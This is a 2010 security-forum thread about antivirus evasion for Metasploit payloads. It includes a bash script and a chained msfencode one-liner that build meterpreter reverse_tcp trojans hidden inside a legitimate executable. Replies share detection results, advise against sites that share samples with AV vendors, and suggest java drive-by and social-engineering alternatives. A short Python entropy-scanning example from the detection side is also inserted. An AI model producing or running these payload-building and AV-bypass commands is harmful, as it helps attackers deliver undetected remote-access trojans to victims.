
Thread: Script 4 AV bypass meterpreters

  1. #1
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default Script 4 AV bypass meterpreters

    avbypass.sh creates a number of files to bypass an AV engine. Most AV engines find a trojan in the meterpreter file. avbypass.sh is a simple script that uses another .exe to hide the trojan in the file and encodes it x times. It is interesting to see, for example, that if you encode it two times VirusTotal reported 5/41 scanners found a trojan, and if you encode it 3 times virustotal.com reported 7/41 scanners found a trojan. So this script creates an x number of files that you can check on Jotti's malware scan (19 AV scanners) or VirusTotal (41 AV scanners).

    Use the script like: #sh avbypass.sh 10.0.0.1 2222 4 /root/testfile

    Code:
    #!/bin/bash
    # (C)opyright 2010 - pigtail23
    # AVbypass Creator v. 1.0 (2010-06-06)
    # Needs bash (not plain sh) because of the [[ ]] tests and the (( )) loop below.
    # Template given to msfencode -x: /pentest/windows-binaries/tools/tftpd32.exe
    # (you can use a file of your choice)
    
    echo "Usage: $0 <IP> <Port> <Number of times to encode> <Filename>"
    
    # All four arguments are required; exit with an error status if any is missing
    if [[ $1 ]]; then echo "IP: $1"; else echo "IP not set"; exit 1; fi
    if [[ $2 ]]; then echo "Port: $2"; else echo "Port not set"; exit 1; fi
    if [[ $3 ]]; then echo "Number: $3"; else echo "Set Number"; exit 1; fi
    if [[ $4 ]]; then echo "Filename: $4"; else echo "Set Filename"; exit 1; fi
    echo "File/-s creating. Pls Wait..."
    
    # One output file per iteration count: <Filename>1.exe, <Filename>2.exe, ... up to $3
    for (( c=1; c<=$3; c++ ))
    do
    	msfpayload windows/meterpreter/reverse_tcp LHOST="$1" LPORT="$2" R | msfencode -c "$c" -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > "$4$c.exe"
    	echo "File $4$c.exe was created."
    done
    I hope this script helps you to check and create your files faster.
    And sorry for my bad English.



    pigtail23

    Next time an update will come that automates the upload to VirusTotal. Have fun ;D
    Last edited by Archangel-Amael; 06-14-2010 at 06:00 PM.

  2. #2
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    5

    Default Re: Script 4 AV bypass meterpreters

    Awesome script, I like that.
    I have been playing around with AV evasion on Metasploit for some months,
    but I don't get my file detected under 5 AV products. I don't know why.
    I have tested out many options; I encoded it in a chain but no effect.
    I like that, so I will test out your script.
    Ähm, how to get my file encoded with more than 2 encoders?
    Sometimes my new encoded executable is broken...

    do you have any idea?

    SilentShadow

  3. #3
    Junior Member
    Join Date
    Feb 2006
    Posts
    25

    Default Re: Script 4 AV bypass meterpreters

    Thanks for sharing this nice script that speeds things up.
    I have found, however, some mixed results. In one case the resulting exe was indeed able to bypass most AVs and execute without a problem. However, after a few minutes the exe just cleanly exited. I tested it on an XP SP3 machine and noticed the original Windows file runs normally and only exits if you forcefully kill it. The msfencoded binary, however, exits on its own.
    Strange behavior that I can't logically figure out. Any thoughts?
    I guess the double encoding somehow adds this annoying bug. Otherwise perfect.

  4. #4
    Junior Member
    Join Date
    Feb 2006
    Posts
    25

    Default Re: Script 4 AV bypass meterpreters

    Quote Originally Posted by SilentShadow View Post
    awesome script i like that.
    i
    ähhm how to get my file encoded with more tan 2 encoders.

    do you have any idea?

    SilentShadow
    I think you can pipe it (|) through multiple times, although it may break the final binary. Try it and let us know if it worked for you.

  5. #5
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Default Re: Script 4 AV bypass meterpreters

    Yes, it works with | ...

  6. #6
    Junior Member
    Join Date
    Aug 2009
    Posts
    27

    Default Re: Script 4 AV bypass meterpreters

    If you use either of those sites, your files will be distributed to the AV companies and will become detected.

    This site has an option not to distribute, whether they stick by it I don't know: scanner.novirusthanks.org

  7. #7
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Script 4 AV bypass meterpreters

    Code:
    cd /pentest/exploits/framework3
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | \
      msfencode -e x86/shikata_ga_nai -c 3 -t raw | \
      msfencode -e x86/call4_dword_xor -c 4 -t raw | \
      msfencode -e x86/fnstenv_mov -c 5 -t raw | \
      msfencode -e x86/countdown -c 4 -t raw | \
      msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe
    Here is my example of a successful multi-encode. Not so sure it accomplishes THAT much. It seems once you've got it encoded to a certain point it won't matter, as most AV that is still detecting it is doing so by a heuristics engine (behaviour?). Correct me if I'm wrong. Definitely still learning.

    This much encoding broke my exe when I tried on bt4-pre-final (metasploit up to date).

    Building the payload using R1 and executing this payload on Win7 x64 got me a meterpreter session.
    I did first build the payload with NO encoding to test against my AV (Avast Free). Avast picks up the meterpreter payload unencoded. Attempt two, using the above command, successfully bypassed it. Again, not sure if that much encoding is really needed, but it is just an example of what you can do with the command.
    Last edited by iproute; 09-18-2010 at 10:56 PM.
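
The "heuristics engine" iproute mentions has a well-known static component: an encoder such as shikata_ga_nai replaces readable code and strings with a near-random blob, and scanners flag regions whose byte entropy approaches 8 bits regardless of how many encoding passes produced them. The Python below is an added illustration of that check from the detection side; it is not code from this thread or from Metasploit. The sample buffer is constructed (a repeated text string standing in for normal program content, plus seeded pseudo-random bytes standing in for an encoded payload), and the 1024-byte window and 7.0-bit threshold are assumed values, not anything a particular product uses.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_windows(data: bytes, window: int = 1024, step: int = 512):
    """Return [(offset, entropy)] for each sliding window over data (one window if data is short)."""
    last_start = max(1, len(data) - window + 1)
    return [(off, shannon_entropy(data[off:off + window])) for off in range(0, last_start, step)]


def high_entropy_regions(data: bytes, threshold: float = 7.0,
                         window: int = 1024, step: int = 512):
    """Offsets of windows whose entropy meets the threshold (the packed/encoded heuristic)."""
    return [off for off, h in entropy_windows(data, window, step) if h >= threshold]


def summarize(data: bytes, threshold: float = 7.0,
              window: int = 1024, step: int = 512) -> dict:
    """Small report a scanner might log: windows examined and which ones were flagged."""
    flagged = high_entropy_regions(data, threshold, window, step)
    return {
        "windows": len(entropy_windows(data, window, step)),
        "flagged": flagged,
        "first_flagged_offset": flagged[0] if flagged else None,
    }


# --- constructed sample, not a real binary ---
# 4096 bytes of repetitive text: stands in for ordinary code/strings in a template exe.
LOW_REGION = (b"This program cannot be run in DOS mode.\r\n" * 100)[:4096]
# 4096 seeded pseudo-random bytes: stands in for an encoded payload blob (no real encoder used).
_rng = random.Random(20100606)
HIGH_REGION = bytes(_rng.getrandbits(8) for _ in range(4096))
SAMPLE = LOW_REGION + HIGH_REGION


if __name__ == "__main__":
    for off, h in entropy_windows(SAMPLE):
        mark = "  <-- high entropy" if h >= 7.0 else ""
        print(f"offset {off:5d}: {h:.2f} bits/byte{mark}")
    print(summarize(SAMPLE))
```

Run as a script it prints one line per window; the text half sits around 4 bits per byte and the pseudo-random half close to 8, so only the second half is flagged. The caveat a defender has to live with is that compressed or encrypted resources and legitimately packed installers trip the same check, which is why this is a heuristic that raises a score rather than a verdict on its own, and why the behavioural detections the thread also mentions exist alongside it.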

  8. #8
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    4

    Default Re: Script 4 AV bypass meterpreters

    I'm encoding ten times but AVG can still detect it. So encoding can't bypass AV fully; is there any other way out??

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: Script 4 AV bypass meterpreters

    Yeah AVG almost always picks up the payloads. I've had difficulty getting them past AVG, and a couple of others. Encoding doesn't seem to help.
    I've really gotta say that I don't think exe payloads are really the best way to get into something anyway. Great tool, but you're much better off with some sort of exploit rather than relying on a client side attack IMHO. I suppose it depends on how practiced at social engineering you are.

    A java drive-by is not detected by AV as I recall. The social engineering toolkit has this attack type scripted, very handy. It's also all there in metasploit for setting up manually.

    As always "Pick the lowest hanging fruit first!" and "Try Harder!"

  10. #10
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: Script 4 AV bypass meterpreters

    Quote Originally Posted by iproute View Post
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

    Here is my example of a successful multi-encode. Not so sure it accomplishes THAT much. It seems once you've got it encoded to a certain point it won't matter, as most AV that is still detecting it is doing so by a heuristics engine (behaviour?). Correct me if I'm wrong. Definitely still learning.

    This much encoding broke my exe when I tried on bt4-pre-final (metasploit up to date).

    Building the payload using R1 and executing this payload on Win7 x64 got me a meterpreter session.
    I did first build the payload with NO encoding to test against my AV (Avast Free). Avast picks up the meterpreter payload unencoded. Attempt two, using the above command, successfully bypassed it. Again, not sure if that much encoding is really needed, but it is just an example of what you can do with the command.
    Can see that you're using a lot of different encoders. I have been looking everywhere to find a command that will list these encoders (currently 27). Do you know how?
